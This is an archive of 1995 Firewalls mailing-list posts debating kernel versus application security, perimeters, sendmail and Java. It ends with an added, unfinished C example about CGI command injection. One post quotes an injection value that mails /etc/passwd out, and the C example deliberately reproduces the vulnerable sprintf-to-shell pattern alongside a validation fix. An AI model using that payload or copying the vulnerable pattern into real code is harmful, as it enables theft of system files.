> command line was longer than 128 (or 156, or 212, or ...), then I'm STILL
> OK if I have decent authentication and access control in the kernel.

Another way to look at the problem is in terms of processor backplanes and security perimeters. Where is the security perimeter? We don't encrypt across our backplanes and we never will, because we need the speed. Perhaps the same argument applies to NFS and X Windows. Industry trends imply that high security on those ranks more as a "nice to have" than a "need." If some IP level security mechanism "secures" them for some purposes, fine. But that's not going to solve all underlying security problems.

> If we try to secure all applications, past, present, and future, then my
> son (turns 3 tomorrow!) will have a great future as an Internet Security
> Consultant.

The point is, we don't have to secure everything. And we won't. We will define and secure some perimeters and we'll take some risks with traffic that crosses the perimeters.

> We should do it once, right.

Passwords looked "right" to a lot of people 30 years ago. And they probably were "right" back then. Times change and so does security.

Rick.
smith@sctc.com secure computing corporation

From firewalls-owner Thu Sep 14 12:58:11 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA19529 for firewalls-outgoing; Thu, 14 Sep 1995 11:15:32 -0700
Received: from kgbvax.network.com (kgbvax.network.com [129.191.202.58]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA19522 for ; Thu, 14 Sep 1995 11:15:24 -0700
Received: (from ted@localhost) by kgbvax.network.com (8.6.9/8.6.9) id NAA18181; Thu, 14 Sep 1995 13:11:50 -0400
Date: Thu, 14 Sep 1995 13:11:50 -0400
From: Ted Doty
Message-Id: <199509141711.NAA18181@kgbvax.network.com>
To: bdboyle@maverick.erenj.com, firewalls@greatcircle.com
Subject: Re: Firewall off Mortal Kombat XIV
In-Reply-To: Mail from '"Bryan D. Boyle" ' dated: Thu, 14 Sep 1995 10:43:53 -0400
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Bryan D. Boyle wrote:
>
> On Sep 14, 8:36am, Ted Doty wrote:
>>
>> All in all, the "hard crunchy shell around the soft chewy center" is looking
>> more and more like the Maginot Line.
>
> Depends on your definition. Read the Berferd paper for inspiration--lots of
[snip]

The Berferd story doesn't address this. While you are correct when you say proper audit collection and analysis is essential, it does not address what happens when an attacker goes around my defenses. If the data doesn't go through my firewall, I can't stop it. That was the whole point of one of the earlier postings: "My foobaz firewall doesn't proxy HTTP, so all my users are getting PPP dial-up access from their desks ..."

Your firewall is in Strasbourg, and the hackers are using an Internet provider in Luxembourg.
;-)

[snip]
> One would dare take that example,
> perchance, as a model for firewall design at the service level (telnet, ftp,
> hypedtext, news, etc), with the proviso that by enlarging the model to
> *acknowledge* flanking maneuvers by determined foemen, we could resist a
> determined focused charge at our stone wall, while protecting the flanks, AND
> giving us time to alert the messengers and get the rest of the defense into
> line.

Nobody will attack your stone wall, you don't even know where your flanks are, and your users won't listen to your messengers or get into line. Security fails if it is centralized into a single point defense, if it is trivial to bypass, and if there is no organizational clout to enforce rules against doing so. Unfortunately, that about sums up the situation most of us are in.

> One must assume, in any case, that the application
> code cranker or the kernel guru is only interested in *their* narrow focus. As
> a net admin, we are the ones that have to define, no matter what smells and
> bells they add in the realm of creeping featuritis, what the limits of their
> operation in the hands of the GUP (great unwashed population) will be.

The application coders shouldn't have to be bothered. The kernel gurus should only have to be bothered very rarely, to give me decent tools that I can apply (once) in all my hosts. Hell, I already have to set up YP and all that; it wouldn't be too much more to set up TCP wrappers, as a second line of defense. The first line of defense would be crypto authentication, so that I can screen out most dangerous things before they even get to the app. This still leaves email, but I can always pipe that thru Sidewinder.

>> I'm fairly optimistic about something like IPSec combined with TCP wrappers;
[snip]
> How about the other way: define the boundaries and then write the code
> (gasp!...:))

Unfortunately, the world is filled with millions of applications that will never be updated.
Like I said, if I have to change something, let me change it ONCE, and get ALL my applications (past, present, and future).

--
- Ted
--------------------------------------------------------------------------
Ted Doty, Network Systems Corporation | phone: +1 301 596-2270
8965 Guilford Road, Suite 250         | fax: +1 410 381-3320
Columbia, MD, 21046 USA               | voice mail: (800) 233-1485
--------------------------------------------------------------------------
The opinion expressed in this message is fictitious. Any resemblance to real opinions, living or dead, is purely coincidental.

From firewalls-owner Thu Sep 14 13:00:14 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA22609 for firewalls-outgoing; Thu, 14 Sep 1995 12:19:09 -0700
Received: from psisa.com ([198.3.200.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA22602 for ; Thu, 14 Sep 1995 12:19:03 -0700
Received: (from chk@localhost) by psisa.com (8.6.12/guess) id OAA23887; Thu, 14 Sep 1995 14:16:56 -0500
Message-Id: <199509141916.OAA23887@psisa.com>
Subject: Re: Secure version of Sendmail
To: smith@sctc.com (Rick Smith)
Date: Thu, 14 Sep 1995 14:16:56 -0500 (CDT)
Cc: firewalls@GreatCircle.COM, smith@sctc.com
In-Reply-To: <199509131728.MAA20468@shade.sctc.com> from "Rick Smith" at Sep 13, 95 12:28:59 pm
From: chk@psa.pencom.com (Christian Kuhtz)
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Content-Length: 660
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> The point is, you *can't* guarantee that a large, capable, general
> purpose package is bug free, whether the bugs are security oriented or
> anything else. So you need something to backstop it, like Type
> Enforcement or maybe MLS protections.

No one said that you can guarantee it. And that has nothing to do with large, capable, or general purpose. Ever heard of systems designed by humans?
Chris

--___ ____ __
| _ \/ __/| \    Christian Kuhtz                               "And dsmit hailed:
| _/\__ \| \ \   Pencom Systems Administration Services         We shall smit thou
|_| /___/|_|__\  on-site at IBM, Gov't Services, Boulder, CO    forever!"

From firewalls-owner Thu Sep 14 13:02:54 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA22464 for firewalls-outgoing; Thu, 14 Sep 1995 12:17:04 -0700
Received: from psisa.com ([198.3.200.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA22438 for ; Thu, 14 Sep 1995 12:16:48 -0700
Received: (from chk@localhost) by psisa.com (8.6.12/guess) id OAA23838; Thu, 14 Sep 1995 14:14:35 -0500
Message-Id: <199509141914.OAA23838@psisa.com>
Subject: Re: Secure version of Sendmail
To: smith@sctc.com (Rick Smith)
Date: Thu, 14 Sep 1995 14:14:35 -0500 (CDT)
Cc: jgt10@amdahl.com, smith@sctc.com, firewalls@GreatCircle.COM
In-Reply-To: <199509141440.JAA19663@shade.sctc.com> from "Rick Smith" at Sep 14, 95 09:40:37 am
From: chk@psa.pencom.com (Christian Kuhtz)
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Content-Length: 1466
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Even if today's version of "smail" is proven secure (unlikely) then
> where are we going to find the time/money/effort/expertise to prove
> that next years' patched version is also secure? And what about the
> incremental changes after that? At some point even the best designed
> and engineered software component will look like sendmail, especially
> packages in the public domain. It costs lots of money and effort to
> maintain design integrity across multiple releases, and that's a huge
> source of bugs right there.

So, what are you saying? The eternal bogus wisdom that there is no such thing as a secure system (including parts of it) seems to catch every single discussion here. Get real and spare us these academic discussions.
The most secure firewall doesn't help if someone can still walk out of the building with a tape full of confidential material. I mean, what's the point of this nonsense. You can only provide security to a certain degree; that doesn't mean at all that your standards are necessarily low or anything. I'm aware of the problem and I pointed it out. And if I have something delicate which I cannot fix, I'll build a wall around it. There is no perfect world.

Chris

--___ ____ __
| _ \/ __/| \    Christian Kuhtz                               "And dsmit hailed:
| _/\__ \| \ \   Pencom Systems Administration Services         We shall smit thou
|_| /___/|_|__\  on-site at IBM, Gov't Services, Boulder, CO    forever!"

From firewalls-owner Thu Sep 14 13:04:05 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA19791 for firewalls-outgoing; Thu, 14 Sep 1995 11:21:08 -0700
Received: from gateway.damark.com (GATEWAY.DAMARK.COM [204.17.145.230]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA19776 for ; Thu, 14 Sep 1995 11:21:02 -0700
Received: by gateway.damark.com; id NAA18701; Thu, 14 Sep 1995 13:19:46 -0500
Received: from unknown(172.31.254.231) by gateway.damark.com via smap (g3.0.1) id sme018697; Thu, 14 Sep 95 13:19:25 -0500
Received: by damark.com (5.65/1.2-eef) id AA20648; Thu, 14 Sep 95 13:17:17 -0500
Message-Id: <9509141817.AA20648@damark.com>
From: "william.wells"
To: firewalls
Subject: Re: Firewall off Mortal Kombat XIV
Date: Thu, 14 Sep 95 13:12:00 +6C
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>> William Wells, Damark International
> Ted Doty, Network Systems Corporation
>> If the consumer wanted security, programmers would add it. The leading
>> home financial software packages support passwords; why? because the
>> people using their software don't want people snooping. When companies
>> lose market share because of poor security, vendors will add it. This
>
> Well said.
> Mostly companies go out of business because they INCLUDE
> security features, which makes their product more costly, harder to
> use, slower, ...
>
> Yet another reason to put it in the kernel.
>

You have well said...

Security, if properly integrated, doesn't make things harder to use. I've worked on B3 systems and barely knew the security was there and I've worked on other systems where it's been a pain. UNIX security seems to be less comprehensive than some of the proprietary systems (which are dying because "everyone wants UNIX" - excepting those on PCs and Macs). UNIX and NFS have many of the same characteristics: the standard features (?) tend to be a 'lowest common denominator' set with application developers filling in the slack.

As an example, it amazes me that UNIX, which predates some proprietary systems, STILL doesn't understand what a labeled tape is and is unable to automatically associate which of several jobs wants to use a labeled tape which was just mounted on any drive. Any operations manager who deals with UNIX systems would love to get that. (Especially those who have used non-UNIX mainframe systems. I've talked to UNIX admins who don't have a clue what the above means.) That is something which belongs in the kernel but which has been defaulted to third party developers (who also seem to not be able to get it right).

So, put security in the kernel: hopefully it will work right. Split privileges into more than "root" or "not-root"; allow ACLs, etc. Maybe it will work properly in a multi-vendor environment. Once you get there, though, you still have the networked SQL database engines which bypass all of UNIX (or any other platform's) system security by sticking their network service outside of the control of the kernel and who knows what other applications in the future (was that SEGA games?).

>> As for the comment about being 'behind the curve'. The example I use
>> is NFS....
> Yet ANOTHER reason to do it in IP.
> If my mount program is brain
> damaged, and does silliness like exporting everything to the world
> because my command line was longer than 128 (or 156, or 212, or ...),
> then I'm STILL OK if I have decent authentication and access control
> in the kernel.
>
> If we try to secure all applications, past, present, and future, then
> my son (turns 3 tomorrow!) will have a great future as an Internet
> Security Consultant. We should do it once, right.

My big concern for the future Internet Security Consultants is that the application developers will have so muddied what a connection can do that the only way to keep their applications from doing damage is to run every application in a restrictive sub-shell on every system. Either that, or the firewalls essentially "execute" every packet, but even then, things will get past. If the application developers can trigger things to occur on your desktop (or mainframe) which you don't want by what is sent on the connection, then all the protection of a firewall is for naught. We'll be guarding the front door, not realizing that the walls have fallen down.
William Wells
Manager, Technical Support
Damark International, Inc
william.wells@damark.com

From firewalls-owner Thu Sep 14 13:08:32 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA14417 for firewalls-outgoing; Thu, 14 Sep 1995 09:49:45 -0700
Received: from gateway.sctc.com (gateway.sctc.com [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA14410 for ; Thu, 14 Sep 1995 09:49:34 -0700
Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id LAA00741; Thu, 14 Sep 1995 11:51:28 -0500
Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 295520000; 14 Sep 95 12:48 CDT
Received: from sctc.com by sccmailhost.sctc.com id 069910000; 14 Sep 95 12:48 CDT
Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id LAA26031; Thu, 14 Sep 1995 11:47:50 -0500
Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id LAA29955; Thu, 14 Sep 1995 11:47:49 -0500
From: Rick Smith
Message-Id: <199509141647.LAA29955@shade.sctc.com>
Subject: Re: Secure version of Sendmail
To: Peter da Silva
Date: Thu, 14 Sep 1995 11:47:49 -0500 (CDT)
Cc: smith@sctc.com, firewalls@greatcircle.com
In-Reply-To: <9509141616.AA24527@sonic.nmti.com.nmti.com> from "Peter da Silva" at Sep 14, 95 11:16:27 am
X-Mailer: ELM [version 2.4 PL23]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 863
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> The point is that if you have a class B O/S you're more likely to skimp
> on the application level stuff. If you get both, that's great, but you
> usually only get one.

I've seen this happen, too. This is why NCSC formal evaluation is too often irrelevant.
If a trusted system is performing a security service, then the application software is often configured to circumvent the standard security measures in some places. This is OK if it's done right, and a huge problem if it's done wrong.

Security is a property of overall system behavior. It's bad news to assume a platform can do it all for you, or that an application can do it all. The best defense needs them to work together. On the SNS Mail Guard the government evaluated the whole thing including the networking and application software.

Rick.
smith@sctc.com secure computing corporation

From firewalls-owner Thu Sep 14 13:09:48 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA14551 for firewalls-outgoing; Thu, 14 Sep 1995 09:51:30 -0700
Received: from gateway.sctc.com (gateway.sctc.com [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA14530 for ; Thu, 14 Sep 1995 09:51:23 -0700
Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id LAA00769 for ; Thu, 14 Sep 1995 11:52:59 -0500
Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 295650000; 14 Sep 95 12:49 CDT
Received: from sctc.com by sccmailhost.sctc.com id 070040000; 14 Sep 95 12:49 CDT
Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id LAA26071; Thu, 14 Sep 1995 11:49:15 -0500
Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id LAA00106; Thu, 14 Sep 1995 11:49:14 -0500
Date: Thu, 14 Sep 1995 11:49:14 -0500
From: Rick Smith
Message-Id: <199509141649.LAA00106@shade.sctc.com>
To: firewalls@greatcircle.com
Cc: smith@sctc.com
Subject: Re: Firewall off Mortal Kombat XIV
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Ted Doty writes:
> At the risk of being Yet Another Security Pinhead, this is the Wrong
> Thing To Do.
> If we think that the number of clueless boneheaded application
> developers is much larger than the number of clueless boneheaded kernel
> developers, then The Right Thing To Do is to put general security hooks in
> the kernel.

Put not your faith in silver bullets, and certainly not in general security hooks in a kernel.

To be useful, the kernel would have to anticipate everything about every application and provide a direct and simple way to represent the security policy any application might ever need. This rarely happens cleanly in practice. Thus, the application ends up implementing its own policy using (or misusing) hooks into the kernel's security mechanisms. Ergo, a bad enough mistake in the application will still yield a vulnerability regardless of how tough the kernel is.

You have to balance responsibility for security between the application and the kernel. Neither can do the job alone. A boneheaded developer can implement an application with security holes just as effectively on a highly secure platform as on a DOS PC.

Rick.
smith@sctc.com secure computing corporation

From firewalls-owner Thu Sep 14 13:12:49 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA15210 for firewalls-outgoing; Thu, 14 Sep 1995 10:03:05 -0700
Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA15192 for ; Thu, 14 Sep 1995 10:02:57 -0700
Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA09930; Thu, 14 Sep 95 12:47:17 -0400
Date: Thu, 14 Sep 95 12:47:17 -0400
Message-Id: <9509141647.AA09930@uvs1.orl.mmc.com>
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: re: firwall off Mortal Kombat...
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Jeff rites:
> I agree.
> It is getting easier and easier for holes to be punched
> through a large corporate "network perimeter". In my opinion (and
> unfortunate experience), insiders are probably the ones who will do
> the hole punching.

Think it is a bit more complicated than that (excellent posting by the way). For years major corporations have had good site security, we just need to expand that to electronic communications. Virtual corporations are going to face all of the problems mentioned but good site security is essential. Add in good encryption between sites and you have a start.

At the physical site level you *can* control connections (a CLASS capable telephone switch can regulate modems but you are going to have to rely on policy to control cellular unless you want to install jammers - not a bad idea BTW). Have been preaching multi-layer security and protected subnets for some time now - it makes sense and is doable - came at it from the opposite direction though, believe it is too draconian/labor intensive to try to control every node so security needs to move to the net/subnet level.

> 1. Instead of relying on one big network perimeter in an organization,
> there will evolve many different ones and multiple layers of perimeters.

Agree with the caveat that the logical separations will be on physical lines & site specific while following more general corporate requirements.

> 2. Individual applications and hosts will become more hardened and
> secure. For old applications, small individual sized "firewall-wrappers" will become available.

I like the term "encapsulated" but that is a quibble. I do separate "trusted hosts" and "trusted subnets" from those containing general purpose workstations.

> As the network perimeter erodes, it has to erode
> to the point of individual hosts or applications (or sets of hosts
> and applications). So hosts will either become secure or have some kind
> of secure wrapper/firewall.
Not necessary for *all* processors but can see having more than one bastion/"trusted" network at a site. The fundamental security layer will remain at the site perimeter.

Warmly, Padgett

ps am on vacation and inna Holiday Inn at the moment so personal replies may have to wait - lotsa messages waiting and the hotel "dataport" was wired backwards 8*(

From firewalls-owner Thu Sep 14 13:19:50 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA15110 for firewalls-outgoing; Thu, 14 Sep 1995 10:01:14 -0700
Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA15099 for ; Thu, 14 Sep 1995 10:01:05 -0700
Received: from Disclosure.COM by relay4.UU.NET with SMTP id QQzhei08442; Thu, 14 Sep 1995 13:00:04 -0400
Received: by Disclosure.COM (4.1/SMI-4.1) id AA05378; Thu, 14 Sep 95 13:00:10 EDT
Date: Thu, 14 Sep 1995 13:00:09 -0400 (EDT)
From: Scott Barman
To: FIREWALLS
Subject: Re: Firewall off Mortal Kombat XIV
In-Reply-To: <9509141314.AA11050@damark.com>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 13 Sep 1995, Marcus J. Ranum wrote:
> These kinds of things keep pointing me back to the basic
> problems I believe we (the security dweebs of the world) are going
> to face in the next 5 years:
>
> 1) The notion of "network perimeter" will erode to the point
> where saying "protect all access into and out of your network"
> will be greeted with hysterical giggles. Right now when I
> say that many of my customers just look at me with a glazed
> eyed expression as if to say, "pull the other one."

*Will* erode?? What makes you think it hasn't already.
Even being in the DC area where there are more spooks per capita than any place else in the US, I have seen more companies with stronger facility security policies (where the policy is see the receptionist at the front desk before being allowed in) than I have with network policy. I mean I even had one person ask me "what's all the fuss being made about security?"

One day I borrowed a test set from a friend who does telecom consulting (putting systems in offices, etc.). He said that one could pick this item up at a Radio Shack for around $30. Basically, it had two wires with alligator clips, an LCD readout (one line, 35 characters), and an RS-232 port. After going through this "what do you need encryption for" I gathered the participants and went on a little field trip: I found the box where the telco wires met the building. All I did to open the box was bang it with my fist once. Since I did learn something when I was a consultant at Bellcore and AT&T (I also asked my friend to show me how the unit worked), I attached the clips to the company's PPP line out (no, it's not the company where I am now). I was reading the traffic with little problem. The display gave me a snapshot of traffic, but I reminded them that I could attach a PC to the RS-232 port and capture EVERYTHING.

It took the politically correct equivalent of bashing their heads in to show them that they needed to secure things. And this is a company whose people wear badges that are also key cards to access the building! Then I sat down at their machine to find it had the sendmail debug bug, allowed NFS mounts to root for anyone, had a '+' in the /etc/hosts.equiv file and a ton of non-local hosts in /etc/hosts (because the sys admin didn't understand how to properly configure a DNS and/or the resolver), and so on.

On Thu, 14 Sep 1995, william.wells wrote:
>I'm looking for an HP/UX system admin: I looked at tons of resumes
>yesterday and found lots of DOS/Windows people.
>That tells me that our
>upcoming batch of programmers are going to base their programming
>skills on what PCs have; not great for Corporate security. People are
>struggling with the concept of changing passwords; makes transferring
>files between systems too hard. They also complain about having to
>log into individual applications. People coming from the mainframe
>shops of the 70s and 80s generally have seen security work; not so
>with people whose only experience has been single user systems.

The system administrator from the above was a Certified Novell Engineer and a Certified Novell Administrator. You walked into his cube, and these pieces of paper were prominently displayed. Also displayed was a certificate from a local training program saying that the admin went through their courses. Not to downplay those programs (I know about them, I teach at one :-), they can only give one an overview of what it takes to do a good job on one machine. Most do not go that much into network security beyond the basics.

Interestingly enough, this company wanted to fire this guy. They wanted this person, who had never touched any other type of computer or OS, to administer this Sun workstation after taking a course and be an expert. This is beyond admin policies and practices; this goes to corporate thinking that led me to a system that was wide open. So wide that if anyone knew they were running Samba, the PC back-ends would have been attacked too.

NOTE: The admin wasn't fired. I gave him many lessons in administration and security as part of my contract. I hate to see folks like that who are trying but don't have the tools fired because of unrealistic expectations.

Back to mjr:
> 2) IPV6 will not save us. I don't expect that all the new
> IP-based toaster ovens, Sega machines, and clock radios
> are going to talk V6. By the time V6 actually exists, the
> installed base will be too large to replace.
> To help get
> your brain around the problem, consider the reaction if
> someone suggested that the US change over to 220 volt
> European power grids.

You would get converters to do the power changes. In fact, they already exist. Most of us who have had the privilege to travel to Europe have these things. You can get a package that would handle almost all of Europe, Middle East and Asia for around $30-35 (less if on sale) in any luggage store. I suspect that the same option will be there for routers, hubs, and bridges. In fact, I have heard that one vendor (was it Cisco?) already has a prototype IPv6->IPv4 converter. How long did it take for the US oil companies to produce all unleaded gas? The conversion to IPv6 will probably take the same amount of time.

mjr:
> 3) The number of new network-aware and IP-aware apps is
> now on an exponential growth curve. Consider, for a moment,
> how the typical network app is developed today:
> Version 1: no security
> Version 2: security? next version
> Version 3: something lame
> With the increase in network-permeation, the actual number
> of things that "get it right" will be close to zero.

william.wells:
>If the consumer wanted security, programmers would add it. The leading
>home financial software packages support passwords; why? because the
>people using their software don't want people snooping. When companies
>lose market share because of poor security, vendors will add it. This
>is what has happened with TCP/IP: people demanded it. We have browsers
>and FTP which understand firewalls and proxies because the vendors
>know they need to support them. Secure transactions on the Internet
>are getting high visibility because the credit card companies want to
>prevent valid card information from being stolen while it is being
>transmitted on the Internet and they are in a position to do something
>about it.
Then someone else (sorry, I didn't save it to give proper attribution) wrote about these programmers doing neat and nifty things but their programs require root to run.

Part of the problem, as has been sort of stated, is the background of those now entering the industry. When I interview people for entry level jobs, I hear about what they learn in school and am shocked about some of the things they do not teach! Now I didn't go to a high-powered computer science school (I started my college career as a music ed. major), but I came out with a better understanding of some of the more technical issues of what I do, including security basics! I mean I have a hard time understanding why these kids do not have a basic understanding of what is going on behind those database engines or even a basic concept of ISAM in order to explain it! Without trying to make myself sound old, who's teaching this stuff nowadays? I can find tons of Sybase programmers, but ask about what it would take to secure things for ad hoc queries? Nobody understands this or even why I would want it!

mjr:
> What does this all mean? It may mean that there's good
>job security in being a computer professional. It may mean that

YES!! I need the job and I don't think I can go back to music ed! :-)

>someone is going to look at the situation and announce that we
>have no clothes. I *HOPE* it means that someone will begin to
>think of new computer security paradigms. Who knows what they
>will be? I don't think we're going to win the war the way it's
>going.

Most of the time, when someone expands a building they make the foundation stronger. Now that the internet is being expanded, the foundation has to follow. I think IPsec out of IPv6 (now an "official" RFC, I understand) is a good step in the right direction, but it cannot end there. Companies need to take a proactive role in coming up with better policies in this regard.
William Wells said it best when he said:
>If the consumer wanted security, programmers would add it.

We, as professionals, need to make the consumer aware they need it and want it. Start there and things could move in a better direction!

william.wells:
>Anyway, I've been typing long enough. Time to get to work.

Three phone calls... some debugging... and now it's lunch time!! :-) All I need is for someone to tell me how I can better convince people they need to think about security without having to come up with new politically correct ways of bashing it into them!

scott barman -- scott barman DISCLAIMER: I speak to anyone who will listen, scott@disclosure.com and I speak only for myself. barman@ix.netcom.com "Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming."

From firewalls-owner Thu Sep 14 13:32:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA23943 for firewalls-outgoing; Thu, 14 Sep 1995 12:40:35 -0700 Received: from gw2.att.com (gw2.att.com [192.20.239.134]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA23927 for ; Thu, 14 Sep 1995 12:40:29 -0700 Received: from vodka.sse.att.com (vodka.gc.att.com) by ig2.att.att.com id AA05853; Thu, 14 Sep 95 15:39:52 EDT Message-Id: <9509141939.AA05853@ig2.att.att.com> From: mdr@vodka.sse.att.com Subject: Re: Secure version of Sendmail To: peter@nmti.com (Peter da Silva) Date: Thu, 14 Sep 1995 15:39:46 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: <9509141616.AA24527@sonic.nmti.com.nmti.com> from "Peter da Silva" at Sep 14, 95 11:16:27 am X-Mailer: ELM [version 2.4 PL23-upenn2.7] Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> > > True enough.
> > The point is, you have to identify and exploit
> > appropriate holes in both sendmail and in the nonbypassable access
> > control mechanism of the OS. A properly designed mechanism is going to
> > present a different kind of penetration problem.
>
> The point is that if you have a class B O/S you're more likely to skimp
> on the application level stuff. If you get both, that's great, but you
> usually only get one.

Yeah, right, I'm gonna go to the trouble of finding and administering a class B OS but I don't care enough about security to fix the application level bugs. The class B stuff protects the OS from the apps, but it doesn't ensure that the apps themselves work properly. However, it can monitor some aspects of the application's behavior.

> > I just found another:
> > sprintf(txt, "sendmail -f %s %s < %s",
> user_provided_string, server_provided_string, tempname);
> > in a web server CGI script.
> > Just pop "; mail phreak < /etc/passwd" in as your address...
>

And you don't see the need for a secure OS underneath your CGI scripts? Amazing. You should run it in a chroot jail as a bare minimum. A C2 or higher OS would be able to spot this kind of bug by monitoring what the CGI script does via the audit trail.

Mark Riggins Secure Systems Engineering AT&T Bell Labs

From firewalls-owner Thu Sep 14 13:34:14 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA27005 for firewalls-outgoing; Thu, 14 Sep 1995 13:20:28 -0700 Received: from Disclosure.COM (di.disclosure.com [205.156.194.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA26972 for ; Thu, 14 Sep 1995 13:20:19 -0700 Received: by Disclosure.COM (4.1/SMI-4.1) id AA06557; Thu, 14 Sep 95 16:22:06 EDT Date: Thu, 14 Sep 1995 16:22:05 -0400 (EDT) From: Scott Barman To: firewalls@greatcircle.com Subject: I wish Java would go away...
Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Once again, this has reared its ugly head on me... I was wondering if anyone has done a security analysis of allowing Java applets behind a firewall? I finally got to see some documentation and (a) I am not impressed (Sun has this knack for doing neat things the wrong way--private email if you want to discuss this), (b) I saw a lot of stuff regarding these applets and Unix, but what if the client machines are pee cees? The NT and Windoze 95 weenies are jumping up and down going "oooo neat!" I'm still responding "oy vey!" :-)

I need feedback from anyone who has run or evaluated it with security in mind. Besides Sun's propaganda, are there any documents on the net I can pick up that comment on it, pro or con?

One more important item... can anyone compare and contrast what Sun is doing vs. SGI's web stuff for both its technical merit and security?

TIA scott barman -- scott barman DISCLAIMER: I speak to anyone who will listen, scott@disclosure.com and I speak only for myself. barman@ix.netcom.com "Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming."
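Mark Riggins' reply two messages up quotes a CGI script that builds a sendmail command line with sprintf() and hands it to a shell, so that an "address" of "; mail phreak < /etc/passwd" becomes a second command. The block below is an added example for this archive, not code from that message or from any product discussed in the thread. It puts the vulnerable pattern beside the fix a practitioner would apply: an allow-list check on the address and a direct fork/execv of sendmail with an argv array, so no shell ever parses the user's input. The sendmail path /usr/lib/sendmail, the address character set and the sample payload are assumptions made for the example.

```c
/* Added example, not code from any message in this thread. It places the
 * sendmail-via-sprintf pattern quoted above beside a version that never
 * lets a shell see user input. Assumptions: sendmail lives at
 * /usr/lib/sendmail, and addresses are limited to a conservative
 * character set (stricter than the RFCs, on purpose). */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <ctype.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* The vulnerable pattern: builds the string the CGI would hand to
 * system(), i.e. to "/bin/sh -c". Returns 0, or -1 if it did not fit. */
int build_shell_command(char *out, size_t outlen,
                        const char *user_provided_string,
                        const char *server_provided_string,
                        const char *tempname)
{
    int n = snprintf(out, outlen, "sendmail -f %s %s < %s",
                     user_provided_string, server_provided_string, tempname);
    return (n >= 0 && (size_t)n < outlen) ? 0 : -1;
}

/* True if the string holds anything the shell treats specially. The
 * payload "; mail phreak < /etc/passwd" trips on ';', ' ' and '<'. */
int contains_shell_metachar(const char *s)
{
    return strpbrk(s, ";|&$`<>()\n\r '\"\\*?[]{}~") != NULL;
}

/* Allow-list check for one address: local@domain, exactly one '@',
 * only alphanumerics and . - _ + on either side, at most 254 bytes. */
int is_safe_address(const char *s)
{
    size_t len = strlen(s);
    const char *at, *p;

    if (len == 0 || len > 254) return 0;
    at = strchr(s, '@');
    if (at == NULL || at == s || at[1] == '\0' || strchr(at + 1, '@') != NULL)
        return 0;
    for (p = s; *p != '\0'; p++) {
        if (isalnum((unsigned char)*p)) continue;
        if (*p == '@' || *p == '.' || *p == '-' || *p == '_' || *p == '+') continue;
        return 0;
    }
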